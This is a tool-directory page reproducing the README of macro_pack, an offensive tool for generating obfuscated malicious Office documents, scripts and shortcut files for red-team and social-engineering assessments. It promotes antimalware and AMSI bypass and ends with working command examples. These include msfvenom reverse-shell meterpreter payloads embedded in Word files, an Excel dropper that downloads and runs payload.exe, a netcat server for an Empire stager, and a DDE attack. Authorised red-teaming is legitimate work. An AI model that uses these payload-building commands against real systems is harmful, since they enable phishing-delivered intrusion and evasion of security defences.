Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
macro_pack — macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research. | Kitploit
Tools/GitHubGitHub/sevagas/macro_pack
Phishing ToolsExploit FrameworksPayload GenerationLateral MovementScripting & AutomationWeb Application ExploitationPenetration TestingSocial EngineeringRed Teaming

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research.

Archived
GitHubsevagas/macro_pack

macro_pack

View RepositoryWebsite
2.3k414202 years agoReviewed by Kitploit
Share

Supported Python versions

macro_pack

Short description


Warning: MacroPack is not maintained since 2021, if you are a pro and need Offensive infosec tools for initial access, assume breach, EDR bypass, check https://www.balliskit.com


MacroPack Community is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack will simplify antimalware solutions bypass and automatize the process from vb source to final Office document or other payload type. It is very simple to use:

  • No configuration required
  • Everything can be done using a single line of code
  • Generation of majority of Office formats and VBS based formats
  • Payloads designed for advanced social engineering attacks (email, USB key, etc)

The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, ...). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. T his tool is written in Python3 and works on both Linux and Windows platforms

Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.

Demo 1

Obfuscation

The tool will use various obfuscation techniques, all automatic. Obfuscation features are compatible with all VBA and VBS based format which can be generated by MacroPack.
Basic obfuscation (-o option) includes:

  • Renaming functions
  • Renaming variables
  • Removing spaces
  • Removing comments
  • Encoding Strings

Generation

MacroPack can generate several kinds of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. File generation is done using the option --generate or -G.

MacroPack pro version also allows you to trojan existing Office files with option --trojan or -T.

Ms Office Supported formats are:

  • MS Word (.doc, .docm, .docx, .dotm)
  • MS Excel (.xls, .xlsm, .xslx, .xltm)
  • MS PowerPoint (.pptm, .potm)
  • MS Access (.accdb, .mdb)
  • MS Visio (.vsd,.vsdm)
  • MS Project (.mpp)

Scripting (txt) supported formats are:

  • VBA text file (.vba)
  • VBS text file (.vbs).
  • Windows Script File (.wsf)
  • Windows Script Components scriptlets (.wsc, .sct)
  • HTML Applications (.hta)
  • XSLT Stylesheet (.xsl) (Yes MS XSLT contains scripts ^^)

Shortcuts/Shell supported formats are:

  • Shell Link (.lnk)
  • Explorer Command File (.scf)
  • URL Shortcut (.url)
  • Groove Shortcuts (.glk)
  • Settings Shortcuts (.settingcontent-ms)
  • MS Library (.library-ms)
  • Setup Information (.inf)
  • Excel Web Query (.iqy)
  • Visual Studio Project (.csproj)
  • Command line (.cmd)
  • SYmbolic LinK (.slk) Pro version only
  • Compressed HTML Help (.chm) Pro version only

Note that all scripting and shortcuts formats (except LNK) can be generated on Linux version of MacroPack as well.

Ethical use

This software must be used only in the context of a Red Team engagement, penetration testing, phishing simulation, security research, or other form of security assessments, with the lawful and formal authorization of the system owners. Usage of this software for attacking targets without prior consent is forbidden and illegal. It is the User’s responsibility to comply with all applicable local, state, federal and national laws.
We assume no liability and are not responsible for any misuse or damage that may be caused by using this software.

About pro mode...

Not all capabilities and options of MacroPack are available on MacroPack Community. Only the community version is available online. Features of the pro version are truly "weaponizing" the process, hence their access is restricted to professionals.
The pro mode includes features such as:

  • Advance antimalware bypass
  • Advanced Shellcode injection methods
  • Command line obfuscation (Dosfuscation)
  • ASR and AMSI bypass
  • Self unpacking VBA/VBS payloads
  • Trojan existing MS Office documents, Help files and Visual Studio projects.
  • Embed decoy payload
  • Lateral movement using DCOM objects
  • Anti reverse engineering
  • Sandbox detection
  • Support of more formats such as Excel 4.0 SYLK and compiled help files
  • Run advanced VB payload from unusual formats
  • Weaponized templates and additional templates (ex EMPIRE, AUTOSHELLCODE)
  • Excel 4.0 macros (XLM)
  • And much more…

Some short demo videos are available on the BallisKit Vimeo channel.

Important: If you wish to contact me about MacroPack pro, use my emeric.nasi [at] sevagas.com email address. I will not answer anonymous inquiries for the Pro version but only professional emails.

Run/Install

Run Windows binary

  1. Get the latest binary from https://github.com/sevagas/macro_pack/releases/
  2. Download binary on PC with genuine Microsoft Office installed.
  3. Open console, CD to binary dir and call the binary, simple as that!
macro_pack.exe --help

Install from sources

You need to be on a Windows machine to build MacroPack. Download and install dependencies:

git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

The tool is in python 3, so just start with your python3 install. ex:

python3 macro_pack.py  --help
# or
python macro_pack.py --help # if python3 is default install

If you want to produce a standalone exe using pyinstaller:

  • Install pyinstaller: pip install pyinstaller
  • Double-click on the "build.bat" script.

The resulted macro_pack.exe will be inside the bin directory.

Some examples

MacroPack Community

  • List all supported file formats
macro_pack.exe --listformats
  • List all available templates
macro_pack.exe --listtemplates
  • Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
  • Obfuscate Empire stager VBA file and generate a MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm
  • Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 
  • Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder
msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \\REMOTE-PC\Share\meter.doc   
  • Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template
# 1 Generate a file containing Empire lauchcher 
# 2 Make that file available on web server, ex with netcat:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
# 3 Use macro\_pack  to generate DROPPER_PS payload in Excel file
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
  • Execute calc.exe via Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xslx
Download Tool